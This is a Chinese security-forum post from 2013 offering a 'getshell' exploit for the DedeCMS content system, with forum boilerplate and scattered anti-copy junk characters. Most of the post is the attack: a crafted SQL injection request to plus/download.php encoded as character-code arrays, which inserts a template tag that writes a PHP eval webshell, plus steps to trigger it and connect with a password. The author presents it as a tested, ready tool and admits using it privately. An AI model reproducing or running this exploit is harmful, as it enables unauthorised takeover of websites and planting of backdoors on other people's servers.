找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2589|回复: 0
打印 上一主题 下一主题

dedecms漏洞getshell EXP最新

[复制链接]
跳转到指定楼层
楼主
发表于 2013-6-10 16:49:18 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
本帖最后由 土豆 于 2013-6-10 14:41 编辑
6 G, g0 r- [/ n2 ?. n  [& P) a4 f8 o. @5 q/ D4 S2 j+ W
/ {3 @3 }% f0 q3 l
作者:鬼哥2 a+ `% C0 n9 k  J9 Q% [/ J; V
; j; t) {7 ]+ }- X9 `+ y. P
看贴不回,没JJ3 d( B) \$ ?9 X% V* z$ ]* l
0 v8 f1 K  z* I. x* D7 {7 H' g
漏洞大家都知道是哪个。
; W! V9 [! S1 Z& @2 p; f9 y
8 |% l9 v; e0 d6 M- {* ]2 A: o其实我一直在玩。。郁闷 虽然这个漏洞不是我第一个发现的,以前也是朋友告诉我。
; H7 ?. a6 e+ q) v( j# o1 a2 E; m$ S2 H$ s* O& _, ~
但是没公开。我承认想自己留着玩。。以前这个漏洞应该很多人知道没发出来而已。( t3 j+ q/ y2 f% V
0 g2 ?% Z! t4 M/ T4 g
刚看了出的几个exp .. 进后台。还得找后台路径 太麻烦了吧?/ ^! v* Z5 p" r2 M, N2 m

/ c1 G! L7 O$ P( b* z0 L9 z+ rgetshell 很容易 。 既然刚发出来的是 sql方法getshell  我也看到几个人发了sql增加表mytag的内容。: |3 U( ~% W: \8 V! J% N

; ~/ R" z6 G7 Q# y" Y但是测试了下。。失败1 M' ?# y9 _% n$ ^* r, u' V2 C' n

3 L, l" m  L; x原因: 用的语句是update  很多站 mytag 里面都没内容。那么你用update 那有什么用 修改不了任何数据。只能用 INSERT 当然,语句带#就会暴  错误。。现在要做的饶过即可。以前也出过那么多dede sql 结合饶过,成功INSERT。
( U5 i+ p, w, P( [! I
% }: @0 c* p1 J7 A* H; Y构造语句:mytag` (aid,expbody,normbody) VALUES(9013,@`\'`,'{dede:php}file_put_contents(''90sec.php'',''<?php eval($_POST[guige]);?>'');{/dede:php}') # @`\'`
. k" s; P! L- d3 ~3 l" U$ }. F, p
EXP:* y  T! [6 L. {9 i
  a6 i* \' G9 U- E- t
http://www.xxx.com/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=40&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=44&arrs2[]=101&arrs2[]=120&arrs2[]=112&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=44&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=41&arrs2[]=32&arrs2[]=86&arrs2[]=65&arrs2[]=76&arrs2[]=85&arrs2[]=69&arrs2[]=83&arrs2[]=40&arrs2[]=57&arrs2[]=48&arrs2[]=49&arrs2[]=51&arrs2[]=44&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96&arrs2[]=44&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=57&arrs2[]=48&arrs2[]=115&arrs2[]=101&arrs2[]=99&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=103&arrs2[]=117&arrs2[]=105&arrs2[]=103&arrs2[]=101&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=41&arrs2[]=32&arrs2[]=35&arrs2[]=32&arrs2[]=64&arrs2[]=96&arrs2[]=92&arrs2[]=39&arrs2[]=96
- Z3 N" W. h( |& w& ~# B
, H6 M  }3 B5 I9 m$ z" [! \/ d0 x1 N6 V( h  X
成功增加。
$ U: n0 ?: W& q/ W; f" U: V; q; w" F4 I- |* k
访问http://www.xxx.com/plus/mytag_js.php?aid=9013
5 u, P6 \+ \% h* |+ s/ \: J生成一句话木马.
8 r, [/ G3 c# L) D3 e% H& h! s4 q菜刀连接 http://www.xxx.com/plus/90sec.php  密码 guige
: P( T+ @* \' @! Q: z/ @$ E: j/ H* w- B0 `& c9 s
测试OK。
0 |4 A" n7 \  Y* f2 w, D4 R. a# s& }
6 t# H4 `! C9 K- h; E2 J 2 C* r7 K- |) d" P9 H( v
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表